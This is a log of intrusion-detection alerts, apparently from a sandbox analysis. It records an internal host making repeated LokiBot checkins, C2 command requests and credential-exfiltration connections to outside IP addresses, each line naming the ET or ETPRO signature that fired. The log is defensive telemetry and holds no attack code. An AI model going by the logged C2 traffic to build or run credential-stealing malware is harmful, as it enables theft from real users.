05/23/24-20:19:01.377448	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49243	80	192.168.2.22	188.114.96.3
05/23/24-20:18:08.948107	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49195	80	192.168.2.22	188.114.96.3
05/23/24-20:19:01.377448	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49243	80	192.168.2.22	188.114.96.3
05/23/24-20:18:26.597772	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49210	80	192.168.2.22	188.114.96.9
05/23/24-20:19:03.316993	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49245	80	192.168.2.22	188.114.97.3
05/23/24-20:17:52.694696	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49180	80	192.168.2.22	188.114.97.3
05/23/24-20:18:08.948107	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49195	80	192.168.2.22	188.114.96.3
05/23/24-20:18:21.836224	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49205	80	192.168.2.22	188.114.96.3
05/23/24-20:18:25.484710	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49209	80	192.168.2.22	188.114.97.3
05/23/24-20:19:07.020535	TCP	2025381	ET TROJAN LokiBot Checkin	49249	80	192.168.2.22	188.114.96.3
05/23/24-20:19:09.943896	TCP	2025381	ET TROJAN LokiBot Checkin	49252	80	192.168.2.22	188.114.96.3
05/23/24-20:19:18.441021	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49262	80	192.168.2.22	188.114.96.3
05/23/24-20:18:07.107766	TCP	2025381	ET TROJAN LokiBot Checkin	49193	80	192.168.2.22	188.114.97.3
05/23/24-20:18:56.909324	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49238	80	192.168.2.22	188.114.97.3
05/23/24-20:18:49.167216	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49230	80	192.168.2.22	188.114.96.3
05/23/24-20:18:48.359257	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49229	80	192.168.2.22	188.114.96.9
05/23/24-20:18:53.400223	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49234	80	192.168.2.22	188.114.96.3
05/23/24-20:17:56.049434	TCP	2025381	ET TROJAN LokiBot Checkin	49182	80	192.168.2.22	188.114.96.3
05/23/24-20:18:00.736741	TCP	2025381	ET TROJAN LokiBot Checkin	49187	80	192.168.2.22	188.114.96.3
05/23/24-20:18:59.521470	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49241	80	192.168.2.22	188.114.97.3
05/23/24-20:19:03.316993	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49245	80	192.168.2.22	188.114.97.3
05/23/24-20:18:03.278750	TCP	2025381	ET TROJAN LokiBot Checkin	49190	80	192.168.2.22	188.114.96.3
05/23/24-20:17:43.183162	TCP	2025381	ET TROJAN LokiBot Checkin	49170	80	192.168.2.22	188.114.97.9
05/23/24-20:17:36.624490	TCP	2024312	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1	49165	80	192.168.2.22	188.114.96.9
05/23/24-20:18:17.156368	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49200	80	192.168.2.22	188.114.96.3
05/23/24-20:18:17.156368	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49200	80	192.168.2.22	188.114.96.3
05/23/24-20:18:56.093323	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49237	80	192.168.2.22	188.114.97.3
05/23/24-20:18:18.976087	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49202	80	192.168.2.22	188.114.96.9
05/23/24-20:17:42.120355	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49169	80	192.168.2.22	188.114.96.3
05/23/24-20:18:18.976087	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49202	80	192.168.2.22	188.114.96.9
05/23/24-20:19:15.184596	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49258	80	192.168.2.22	188.114.96.3
05/23/24-20:18:11.714251	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49198	80	192.168.2.22	188.114.96.3
05/23/24-20:19:15.184596	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49258	80	192.168.2.22	188.114.96.3
05/23/24-20:18:22.772748	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49206	80	192.168.2.22	188.114.96.3
05/23/24-20:18:21.836224	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49205	80	192.168.2.22	188.114.96.3
05/23/24-20:17:36.624490	TCP	2024317	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2	49165	80	192.168.2.22	188.114.96.9
05/23/24-20:17:44.106859	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49171	80	192.168.2.22	188.114.97.3
05/23/24-20:18:39.381191	TCP	2025381	ET TROJAN LokiBot Checkin	49219	80	192.168.2.22	188.114.97.3
05/23/24-20:18:04.176231	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49191	80	192.168.2.22	188.114.96.3
05/23/24-20:18:09.860809	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49196	80	192.168.2.22	188.114.97.3
05/23/24-20:18:01.557933	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49188	80	192.168.2.22	188.114.96.3
05/23/24-20:18:52.425128	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49233	80	192.168.2.22	188.114.97.3
05/23/24-20:18:24.566045	TCP	2025381	ET TROJAN LokiBot Checkin	49208	80	192.168.2.22	188.114.96.3
05/23/24-20:18:01.557933	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49188	80	192.168.2.22	188.114.96.3
05/23/24-20:19:16.882044	TCP	2025381	ET TROJAN LokiBot Checkin	49260	80	192.168.2.22	188.114.96.3
05/23/24-20:17:57.920775	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49184	80	192.168.2.22	188.114.96.3
05/23/24-20:17:46.332436	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49173	80	192.168.2.22	188.114.96.3
05/23/24-20:19:05.135747	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49247	80	192.168.2.22	188.114.97.9
05/23/24-20:18:04.176231	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49191	80	192.168.2.22	188.114.96.3
05/23/24-20:18:45.625277	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49226	80	192.168.2.22	188.114.96.3
05/23/24-20:18:02.368807	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49189	80	192.168.2.22	188.114.96.3
05/23/24-20:18:38.560340	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49218	80	192.168.2.22	188.114.97.9
05/23/24-20:17:40.814233	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49168	80	192.168.2.22	188.114.97.3
05/23/24-20:18:26.597772	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49210	80	192.168.2.22	188.114.96.9
05/23/24-20:18:38.560340	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49218	80	192.168.2.22	188.114.97.9
05/23/24-20:17:51.806006	TCP	2025381	ET TROJAN LokiBot Checkin	49179	80	192.168.2.22	188.114.96.3
05/23/24-20:17:50.944456	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49178	80	192.168.2.22	188.114.96.3
05/23/24-20:18:10.679781	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49197	80	192.168.2.22	188.114.96.3
05/23/24-20:19:14.278026	TCP	2025381	ET TROJAN LokiBot Checkin	49257	80	192.168.2.22	188.114.96.3
05/23/24-20:18:23.674890	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49207	80	192.168.2.22	188.114.96.3
05/23/24-20:18:26.597772	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49210	80	192.168.2.22	188.114.96.9
05/23/24-20:19:01.377448	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49243	80	192.168.2.22	188.114.96.3
05/23/24-20:19:17.653379	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49261	80	192.168.2.22	188.114.96.3
05/23/24-20:19:17.653379	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49261	80	192.168.2.22	188.114.96.3
05/23/24-20:17:39.511374	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49167	80	192.168.2.22	188.114.97.3
05/23/24-20:17:49.147570	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49176	80	192.168.2.22	188.114.96.3
05/23/24-20:19:02.183841	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49244	80	192.168.2.22	188.114.96.9
05/23/24-20:19:13.398917	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49256	80	192.168.2.22	188.114.97.3
05/23/24-20:19:16.005968	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49259	80	192.168.2.22	188.114.97.3
05/23/24-20:19:10.741295	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49253	80	192.168.2.22	188.114.97.3
05/23/24-20:18:40.275029	TCP	2025381	ET TROJAN LokiBot Checkin	49220	80	192.168.2.22	188.114.97.9
05/23/24-20:19:08.863871	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49251	80	192.168.2.22	188.114.96.3
05/23/24-20:18:57.792134	TCP	2025381	ET TROJAN LokiBot Checkin	49239	80	192.168.2.22	188.114.97.3
05/23/24-20:18:37.677256	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49217	80	192.168.2.22	188.114.96.3
05/23/24-20:19:13.398917	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49256	80	192.168.2.22	188.114.97.3
05/23/24-20:17:35.132025	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49164	80	192.168.2.22	188.114.97.3
05/23/24-20:17:39.511374	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49167	80	192.168.2.22	188.114.97.3
05/23/24-20:18:30.098368	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49214	80	192.168.2.22	188.114.96.9
05/23/24-20:18:43.784658	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49224	80	192.168.2.22	188.114.97.3
05/23/24-20:19:00.429820	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49242	80	192.168.2.22	188.114.96.3
05/23/24-20:18:42.915752	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49223	80	192.168.2.22	188.114.97.3
05/23/24-20:18:30.098368	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49214	80	192.168.2.22	188.114.96.9
05/23/24-20:18:42.915752	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49223	80	192.168.2.22	188.114.97.3
05/23/24-20:18:19.988815	TCP	2025381	ET TROJAN LokiBot Checkin	49203	80	192.168.2.22	188.114.96.3
05/23/24-20:18:44.730541	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49225	80	192.168.2.22	188.114.97.3
05/23/24-20:17:54.073092	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49181	80	192.168.2.22	188.114.96.3
05/23/24-20:18:16.270962	TCP	2025381	ET TROJAN LokiBot Checkin	49199	80	192.168.2.22	188.114.96.3
05/23/24-20:17:52.694696	TCP	2025381	ET TROJAN LokiBot Checkin	49180	80	192.168.2.22	188.114.97.3
05/23/24-20:18:56.093323	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49237	80	192.168.2.22	188.114.97.3
05/23/24-20:17:56.984952	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49183	80	192.168.2.22	188.114.97.3
05/23/24-20:17:42.120355	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49169	80	192.168.2.22	188.114.96.3
05/23/24-20:18:56.093323	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49237	80	192.168.2.22	188.114.97.3
05/23/24-20:19:02.183841	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49244	80	192.168.2.22	188.114.96.9
05/23/24-20:18:09.860809	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49196	80	192.168.2.22	188.114.97.3
05/23/24-20:18:44.730541	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49225	80	192.168.2.22	188.114.97.3
05/23/24-20:18:37.677256	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49217	80	192.168.2.22	188.114.96.3
05/23/24-20:18:50.061779	TCP	2025381	ET TROJAN LokiBot Checkin	49231	80	192.168.2.22	188.114.96.3
05/23/24-20:18:07.989686	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49194	80	192.168.2.22	188.114.96.3
05/23/24-20:18:28.376454	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49212	80	192.168.2.22	188.114.96.9
05/23/24-20:18:43.784658	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49224	80	192.168.2.22	188.114.97.3
05/23/24-20:18:49.167216	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49230	80	192.168.2.22	188.114.96.3
05/23/24-20:19:00.429820	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49242	80	192.168.2.22	188.114.96.3
05/23/24-20:18:10.679781	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49197	80	192.168.2.22	188.114.96.3
05/23/24-20:18:08.948107	TCP	2025381	ET TROJAN LokiBot Checkin	49195	80	192.168.2.22	188.114.96.3
05/23/24-20:18:29.294238	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49213	80	192.168.2.22	188.114.96.3
05/23/24-20:18:29.294238	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49213	80	192.168.2.22	188.114.96.3
05/23/24-20:18:41.210686	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49221	80	192.168.2.22	188.114.97.3
05/23/24-20:18:10.679781	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49197	80	192.168.2.22	188.114.96.3
05/23/24-20:18:43.784658	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49224	80	192.168.2.22	188.114.97.3
05/23/24-20:17:38.077506	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49166	80	192.168.2.22	188.114.97.3
05/23/24-20:17:39.511374	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49167	80	192.168.2.22	188.114.97.3
05/23/24-20:17:56.984952	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49183	80	192.168.2.22	188.114.97.3
05/23/24-20:17:58.820260	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49185	80	192.168.2.22	188.114.96.3
05/23/24-20:19:17.653379	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49261	80	192.168.2.22	188.114.96.3
05/23/24-20:17:45.155201	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49172	80	192.168.2.22	188.114.96.3
05/23/24-20:17:38.077506	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49166	80	192.168.2.22	188.114.97.3
05/23/24-20:18:21.836224	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49205	80	192.168.2.22	188.114.96.3
05/23/24-20:17:57.920775	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49184	80	192.168.2.22	188.114.96.3
05/23/24-20:19:12.597934	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49255	80	192.168.2.22	188.114.96.3
05/23/24-20:18:27.512891	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49211	80	192.168.2.22	188.114.97.3
05/23/24-20:17:45.155201	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49172	80	192.168.2.22	188.114.96.3
05/23/24-20:17:57.920775	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49184	80	192.168.2.22	188.114.96.3
05/23/24-20:18:58.594043	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49240	80	192.168.2.22	188.114.96.9
05/23/24-20:18:06.045591	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49192	80	192.168.2.22	188.114.97.3
05/23/24-20:18:27.512891	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49211	80	192.168.2.22	188.114.97.3
05/23/24-20:18:54.312724	TCP	2025381	ET TROJAN LokiBot Checkin	49235	80	192.168.2.22	188.114.97.3
05/23/24-20:18:45.625277	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49226	80	192.168.2.22	188.114.96.3
05/23/24-20:18:47.441038	TCP	2025381	ET TROJAN LokiBot Checkin	49228	80	192.168.2.22	188.114.96.3
05/23/24-20:19:11.675767	TCP	2025381	ET TROJAN LokiBot Checkin	49254	80	192.168.2.22	188.114.96.9
05/23/24-20:18:25.484710	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49209	80	192.168.2.22	188.114.97.3
05/23/24-20:19:12.597934	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49255	80	192.168.2.22	188.114.96.3
05/23/24-20:19:10.741295	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49253	80	192.168.2.22	188.114.97.3
05/23/24-20:18:46.517579	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49227	80	192.168.2.22	188.114.96.9
05/23/24-20:18:45.625277	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49226	80	192.168.2.22	188.114.96.3
05/23/24-20:17:58.820260	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49185	80	192.168.2.22	188.114.96.3
05/23/24-20:19:05.135747	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49247	80	192.168.2.22	188.114.97.9
05/23/24-20:18:46.517579	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49227	80	192.168.2.22	188.114.96.9
05/23/24-20:18:04.176231	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49191	80	192.168.2.22	188.114.96.3
05/23/24-20:19:05.135747	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49247	80	192.168.2.22	188.114.97.9
05/23/24-20:19:10.741295	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49253	80	192.168.2.22	188.114.97.3
05/23/24-20:19:02.183841	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49244	80	192.168.2.22	188.114.96.9
05/23/24-20:17:39.511374	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49167	80	192.168.2.22	188.114.97.3
05/23/24-20:18:24.566045	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49208	80	192.168.2.22	188.114.96.3
05/23/24-20:19:02.183841	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49244	80	192.168.2.22	188.114.96.9
05/23/24-20:19:01.377448	TCP	2025381	ET TROJAN LokiBot Checkin	49243	80	192.168.2.22	188.114.96.3
05/23/24-20:19:14.278026	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49257	80	192.168.2.22	188.114.96.3
05/23/24-20:19:10.741295	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49253	80	192.168.2.22	188.114.97.3
05/23/24-20:19:17.653379	TCP	2025381	ET TROJAN LokiBot Checkin	49261	80	192.168.2.22	188.114.96.3
05/23/24-20:18:23.674890	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49207	80	192.168.2.22	188.114.96.3
05/23/24-20:18:39.381191	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49219	80	192.168.2.22	188.114.97.3
05/23/24-20:19:14.278026	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49257	80	192.168.2.22	188.114.96.3
05/23/24-20:17:50.944456	TCP	2025381	ET TROJAN LokiBot Checkin	49178	80	192.168.2.22	188.114.96.3
05/23/24-20:19:00.429820	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49242	80	192.168.2.22	188.114.96.3
05/23/24-20:18:17.156368	TCP	2025381	ET TROJAN LokiBot Checkin	49200	80	192.168.2.22	188.114.96.3
05/23/24-20:18:41.981231	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49222	80	192.168.2.22	188.114.96.9
05/23/24-20:18:54.312724	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49235	80	192.168.2.22	188.114.97.3
05/23/24-20:18:18.976087	TCP	2025381	ET TROJAN LokiBot Checkin	49202	80	192.168.2.22	188.114.96.9
05/23/24-20:18:46.517579	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49227	80	192.168.2.22	188.114.96.9
05/23/24-20:19:01.377448	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49243	80	192.168.2.22	188.114.96.3
05/23/24-20:18:27.512891	TCP	2025381	ET TROJAN LokiBot Checkin	49211	80	192.168.2.22	188.114.97.3
05/23/24-20:18:54.312724	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49235	80	192.168.2.22	188.114.97.3
05/23/24-20:19:00.429820	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49242	80	192.168.2.22	188.114.96.3
05/23/24-20:17:38.077506	TCP	2025381	ET TROJAN LokiBot Checkin	49166	80	192.168.2.22	188.114.97.3
05/23/24-20:19:11.675767	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49254	80	192.168.2.22	188.114.96.9
05/23/24-20:18:58.594043	TCP	2025381	ET TROJAN LokiBot Checkin	49240	80	192.168.2.22	188.114.96.9
05/23/24-20:19:15.184596	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49258	80	192.168.2.22	188.114.96.3
05/23/24-20:18:22.772748	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49206	80	192.168.2.22	188.114.96.3
05/23/24-20:18:11.714251	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49198	80	192.168.2.22	188.114.96.3
05/23/24-20:17:42.120355	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49169	80	192.168.2.22	188.114.96.3
05/23/24-20:18:37.677256	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49217	80	192.168.2.22	188.114.96.3
05/23/24-20:17:42.120355	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49169	80	192.168.2.22	188.114.96.3
05/23/24-20:18:41.210686	TCP	2025381	ET TROJAN LokiBot Checkin	49221	80	192.168.2.22	188.114.97.3
05/23/24-20:18:41.981231	TCP	2025381	ET TROJAN LokiBot Checkin	49222	80	192.168.2.22	188.114.96.9
05/23/24-20:18:44.730541	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49225	80	192.168.2.22	188.114.97.3
05/23/24-20:18:01.557933	TCP	2025381	ET TROJAN LokiBot Checkin	49188	80	192.168.2.22	188.114.96.3
05/23/24-20:19:09.943896	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49252	80	192.168.2.22	188.114.96.3
05/23/24-20:18:44.730541	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49225	80	192.168.2.22	188.114.97.3
05/23/24-20:18:55.233506	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49236	80	192.168.2.22	188.114.96.9
05/23/24-20:19:11.675767	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49254	80	192.168.2.22	188.114.96.9
05/23/24-20:18:55.233506	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49236	80	192.168.2.22	188.114.96.9
05/23/24-20:19:09.943896	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49252	80	192.168.2.22	188.114.96.3
05/23/24-20:18:10.679781	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49197	80	192.168.2.22	188.114.96.3
05/23/24-20:18:07.107766	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49193	80	192.168.2.22	188.114.97.3
05/23/24-20:18:30.957362	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49215	80	192.168.2.22	188.114.97.3
05/23/24-20:18:21.836224	TCP	2025381	ET TROJAN LokiBot Checkin	49205	80	192.168.2.22	188.114.96.3
05/23/24-20:18:30.957362	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49215	80	192.168.2.22	188.114.97.3
05/23/24-20:19:06.064261	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49248	80	192.168.2.22	188.114.96.3
05/23/24-20:18:11.714251	TCP	2025381	ET TROJAN LokiBot Checkin	49198	80	192.168.2.22	188.114.96.3
05/23/24-20:17:51.806006	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49179	80	192.168.2.22	188.114.96.3
05/23/24-20:17:54.073092	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49181	80	192.168.2.22	188.114.96.3
05/23/24-20:19:16.005968	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49259	80	192.168.2.22	188.114.97.3
05/23/24-20:17:56.049434	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49182	80	192.168.2.22	188.114.96.3
05/23/24-20:18:22.772748	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49206	80	192.168.2.22	188.114.96.3
05/23/24-20:17:51.806006	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49179	80	192.168.2.22	188.114.96.3
05/23/24-20:17:50.058542	TCP	2025381	ET TROJAN LokiBot Checkin	49177	80	192.168.2.22	188.114.96.9
05/23/24-20:17:52.694696	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49180	80	192.168.2.22	188.114.97.3
05/23/24-20:18:31.712532	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49216	80	192.168.2.22	188.114.97.3
05/23/24-20:17:40.814233	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49168	80	192.168.2.22	188.114.97.3
05/23/24-20:18:40.275029	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49220	80	192.168.2.22	188.114.97.9
05/23/24-20:17:57.920775	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49184	80	192.168.2.22	188.114.96.3
05/23/24-20:19:12.597934	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49255	80	192.168.2.22	188.114.96.3
05/23/24-20:19:03.316993	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49245	80	192.168.2.22	188.114.97.3
05/23/24-20:18:28.376454	TCP	2025381	ET TROJAN LokiBot Checkin	49212	80	192.168.2.22	188.114.96.9
05/23/24-20:18:31.712532	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49216	80	192.168.2.22	188.114.97.3
05/23/24-20:18:18.079750	TCP	2025381	ET TROJAN LokiBot Checkin	49201	80	192.168.2.22	188.114.97.3
05/23/24-20:19:12.597934	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49255	80	192.168.2.22	188.114.96.3
05/23/24-20:18:59.521470	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49241	80	192.168.2.22	188.114.97.3
05/23/24-20:19:03.316993	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49245	80	192.168.2.22	188.114.97.3
05/23/24-20:19:16.882044	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49260	80	192.168.2.22	188.114.96.3
05/23/24-20:19:06.064261	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49248	80	192.168.2.22	188.114.96.3
05/23/24-20:19:07.888746	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49250	80	192.168.2.22	188.114.96.3
05/23/24-20:18:48.359257	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49229	80	192.168.2.22	188.114.96.9
05/23/24-20:18:51.088057	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49232	80	192.168.2.22	188.114.97.3
05/23/24-20:18:56.909324	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49238	80	192.168.2.22	188.114.97.3
05/23/24-20:18:52.425128	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49233	80	192.168.2.22	188.114.97.3
05/23/24-20:18:16.270962	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49199	80	192.168.2.22	188.114.96.3
05/23/24-20:18:56.909324	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49238	80	192.168.2.22	188.114.97.3
05/23/24-20:18:16.270962	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49199	80	192.168.2.22	188.114.96.3
